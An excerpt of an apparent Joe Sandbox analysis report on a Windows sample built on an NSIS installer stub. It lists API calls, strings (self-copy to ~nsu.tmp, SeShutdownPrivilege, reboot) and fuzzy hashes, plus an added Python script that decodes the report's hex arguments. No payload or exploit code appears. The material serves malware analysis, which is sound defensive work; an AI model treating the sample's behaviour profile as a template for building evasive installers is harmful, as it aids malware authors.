                                                                                                          • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                                                          • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                                                          • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                                                          • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                                                          • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                                                          • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                                                          Similarity
                                                                                                          • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                          • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                                                          • API String ID: 2435955865-239407132
                                                                                                          • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                                                          • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                                                          • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                                                          • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E
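The "APIs" bullet lines in these function records are the part of a Joe Sandbox record an analyst actually reads, but the report prints every argument as a raw hex word, so flag values such as SetErrorMode(00008001), GlobalAlloc(00000042), SetClipboardData(0000000D) and ExitWindowsEx(00000002) have to be decoded by hand. The script below is an added example, not Joe Sandbox code or tooling: it parses bullet lines in exactly the format shown in the records above into structured call records, names the constants that matter for this sample, and checks a record for the NSIS installer-stub markers ("NSIS Error", "~nsu.tmp", "NCRC", "/D=", "_?=") that all appear in the 0x403883 record's String ID line. The sample input is a handful of lines copied from the 0x403883 and 0x4050CD records; the PBM_*/LVM_* message names are an assumption that the SendMessageW targets are the controls NSIS uses them on, since WM_USER-relative IDs mean different things for different control classes.

```python
"""Parse Joe Sandbox "APIs" bullet lines and name the raw hex constants. Added example, not Joe Sandbox code."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: bullet lines copied from the 0x403883 and 0x4050CD records
# on this page, plus one indented "Part of subcall function" line.
SAMPLE_LINES = """\
• SetErrorMode.KERNELBASE(00008001), ref: 004038AD
• GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
• lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
• CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
• ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
• CreatePopupMenu.USER32 ref: 00405376
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
• GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
• SetClipboardData.USER32(0000000D,00000000), ref: 00405468
  • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
"""

# One bullet: [Part of subcall function XXXX:] Name.MODULE[(args)][,] ref: ADDR
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[#\w]+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list                        # int for 8-digit hex words, None for '?', str otherwise
    ref: int                          # call-site address
    subcall_of: Optional[int] = None  # set on "Part of subcall function" lines

def _parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None                   # argument the analysis could not resolve
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else tok

def parse_api_lines(text: str) -> List[ApiCall]:
    """One ApiCall per matching bullet line; headings and other lines are skipped.
    Arguments are split on commas, which is fine for the report's normal lines."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if m:
            raw, sub = m.group("args"), m.group("sub")
            calls.append(ApiCall(m.group("name"), m.group("module"),
                                 [_parse_arg(a) for a in raw.split(",")] if raw else [],
                                 int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls

# Tables for the constants that matter in this sample's records.
_SEM = {0x0001: "SEM_FAILCRITICALERRORS", 0x0002: "SEM_NOGPFAULTERRORBOX",
        0x0004: "SEM_NOALIGNMENTFAULTEXCEPT", 0x8000: "SEM_NOOPENFILEERRORBOX"}
_GMEM = {0x0002: "GMEM_MOVEABLE", 0x0040: "GMEM_ZEROINIT"}
_EWX = {0x0001: "EWX_SHUTDOWN", 0x0002: "EWX_REBOOT", 0x0004: "EWX_FORCE", 0x0008: "EWX_POWEROFF"}
_CF = {1: "CF_TEXT", 13: "CF_UNICODETEXT"}
# WM_USER/CCM-relative message IDs are control-specific; these names assume the
# targets NSIS uses them on (progress bar PBM_*, log list view LVM_*).
_MSG = {0x0401: "PBM_SETRANGE", 0x0409: "PBM_SETBARCOLOR", 0x2001: "PBM_SETBKCOLOR",
        0x1004: "LVM_GETITEMCOUNT", 0x1061: "LVM_INSERTCOLUMNW", 0x1073: "LVM_GETITEMTEXTW"}

def _flags(value: int, table: dict) -> str:
    names = [n for bit, n in table.items() if value & bit]
    if value & ~sum(table):           # bits with no name in the table
        names.append(f"0x{value & ~sum(table):X}")
    return "|".join(names) if names else "0"

def _show(x) -> str:
    return "?" if x is None else (f"0x{x:X}" if isinstance(x, int) else repr(x))

def decode_call(c: ApiCall) -> str:
    """One-line reading of a call with known constants named."""
    a = c.args
    if c.name == "SetErrorMode" and a and isinstance(a[0], int):
        return f"SetErrorMode({_flags(a[0], _SEM)})"
    if c.name == "GlobalAlloc" and len(a) >= 2 and isinstance(a[0], int):
        return f"GlobalAlloc({_flags(a[0], _GMEM)}, {_show(a[1])} bytes)"
    if c.name == "ExitWindowsEx" and a and isinstance(a[0], int):
        return f"ExitWindowsEx({_flags(a[0], _EWX) if a[0] else 'EWX_LOGOFF'})"
    if c.name == "SetClipboardData" and a and isinstance(a[0], int):
        return f"SetClipboardData({_CF.get(a[0], _show(a[0]))})"
    if c.name == "SendMessageW" and len(a) >= 4 and isinstance(a[1], int):
        msg, extra = _MSG.get(a[1], _show(a[1])), ""
        if msg == "PBM_SETRANGE" and isinstance(a[3], int):   # lParam = MAKELPARAM(min, max)
            extra = f" range {a[3] & 0xFFFF}..{a[3] >> 16}"
        return f"SendMessageW({msg}, wParam={_show(a[2])}, lParam={_show(a[3])}){extra}"
    return f"{c.name}({', '.join(_show(x) for x in a)})"

# Strings the NSIS installer stub is known for; all five appear in the 0x403883 record.
NSIS_MARKERS = ("NSIS Error", "~nsu.tmp", "NCRC", "/D=", "_?=")

def nsis_stub_markers(calls: List[ApiCall], strings: List[str]) -> List[str]:
    """NSIS stub markers found among call arguments or a record's string list."""
    seen = {s for c in calls for s in c.args if isinstance(s, str)} | set(strings)
    return [m for m in NSIS_MARKERS if m in seen]

if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_LINES)
    for c in calls:
        print(f"{c.ref:08X} {c.module:<11}{decode_call(c)}")
    print("NSIS stub markers:", nsis_stub_markers(calls, ["NSIS Error", "NCRC", "/D=", "_?="]))
```

Run on the 0x403883 record this gives SetErrorMode(SEM_FAILCRITICALERRORS|SEM_NOOPENFILEERRORBOX), the ~nsu.tmp self-copy via CopyFileW, and ExitWindowsEx(EWX_REBOOT) after the SeShutdownPrivilege string, which is the stock NSIS stub's uninstaller-copy and reboot-on-finish path; the 0x4050CD record decodes to the installer's progress bar (PBM_SETRANGE 0..30000) and the "copy details to clipboard" handler (GlobalAlloc GMEM_MOVEABLE|GMEM_ZEROINIT, SetClipboardData CF_UNICODETEXT). Decoding them this way lets an analyst confirm the wrapper in seconds and spend the time on what the installer drops.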

Control-flow Graph

[Interactive figure: control-flow graph of the function at 0x4074BB (entry block 0x4074BB-0x4074C0), with executed and not-executed basic blocks marked. The edge list that rendered it is omitted here. This record lists no APIs of its own, but the graph shows GlobalFree being called from the blocks at 0x4073C2 and 0x40743A and GlobalAlloc from the blocks at 0x4073CB and 0x407443.]
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                          • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                                                          • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                          • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                                                          APIs
                                                                                                          • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                          • String ID:
                                                                                                          • API String ID: 310444273-0
                                                                                                          • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                          • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                                                          • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                          • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                          • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                          • String ID:
                                                                                                          • API String ID: 2295610775-0
                                                                                                          • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                          • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                                                          • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                          • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                                                                          Control-flow Graph
                                                                                                          (basic-block graph image not captured in this export; legend: Executed / Not Executed)
                                                                                                          APIs
                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                                                          • ShowWindow.USER32(?), ref: 004054D2
                                                                                                          • DestroyWindow.USER32 ref: 004054E6
                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                                                          • GetDlgItem.USER32(?,?), ref: 00405523
                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                                                          • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                                                          • EnableWindow.USER32(?,?), ref: 00405757
                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                                                          • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                                                          • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                                                          • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                          • String ID: @rD
                                                                                                          • API String ID: 3282139019-3814967855
                                                                                                          • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                                                          • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                                                          • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                                                          • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                                                                                          Control-flow Graph
                                                                                                          (basic-block graph image not captured in this export; legend: Executed / Not Executed)
                                                                                                          APIs
                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                          • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                          • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                          • ShowWindow.USER32(?), ref: 00401753
                                                                                                          • ShowWindow.USER32(?), ref: 00401767
                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                          • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                          • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                          • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                          • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                          Strings
                                                                                                          • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                          • SetFileAttributes failed., xrefs: 004017A1
                                                                                                          • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                          • Rename on reboot: %s, xrefs: 00401943
                                                                                                          • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                          • Rename: %s, xrefs: 004018F8
                                                                                                          • detailprint: %s, xrefs: 00401679
                                                                                                          • Aborting: "%s", xrefs: 0040161D
                                                                                                          • Jump: %d, xrefs: 00401602
                                                                                                          • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                          • Sleep(%d), xrefs: 0040169D
                                                                                                          • Rename failed: %s, xrefs: 0040194B
                                                                                                          • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                          • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                          • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                          • BringToFront, xrefs: 004016BD
                                                                                                          • Call: %d, xrefs: 0040165A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                          • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                          • API String ID: 2872004960-3619442763
                                                                                                          • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                          • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                                                          • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                          • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                                                                          Control-flow Graph
                                                                                                          (basic-block graph image not captured in this export; legend: Executed / Not Executed)
                                                                                                          APIs
                                                                                                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                          • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                                                          • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                                                          • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                                                          • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                                                          • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                                                          • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                                                            • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                                                          • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                                                          • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                          • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                          • API String ID: 608394941-1650083594
                                                                                                          • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                                                          • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                                                          • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                                                          • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,HeadersLobbyDeclineGirlfriend,004CB0B0,00000000,00000000), ref: 00401A76
                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,HeadersLobbyDeclineGirlfriend,HeadersLobbyDeclineGirlfriend,00000000,00000000,HeadersLobbyDeclineGirlfriend,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                          • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$HeadersLobbyDeclineGirlfriend
                                                                                                          • API String ID: 4286501637-2706768650
                                                                                                          • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                                                          • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                                                          • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                                                          • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

Control-flow Graph (rendered graph with Executed / Not Executed block colouring; edge data omitted. Entry block 403587-4035d5: GetTickCount, GetModuleFileNameW, call 405e50; blocks continue through 4037c5-4037ca.)
                                                                                                          APIs
                                                                                                          • GetTickCount.KERNEL32 ref: 00403598
                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                                                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                                                          Strings
                                                                                                          • Inst, xrefs: 0040366C
                                                                                                          • Error launching installer, xrefs: 004035D7
                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                                                          • soft, xrefs: 00403675
                                                                                                          • Null, xrefs: 0040367E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmp
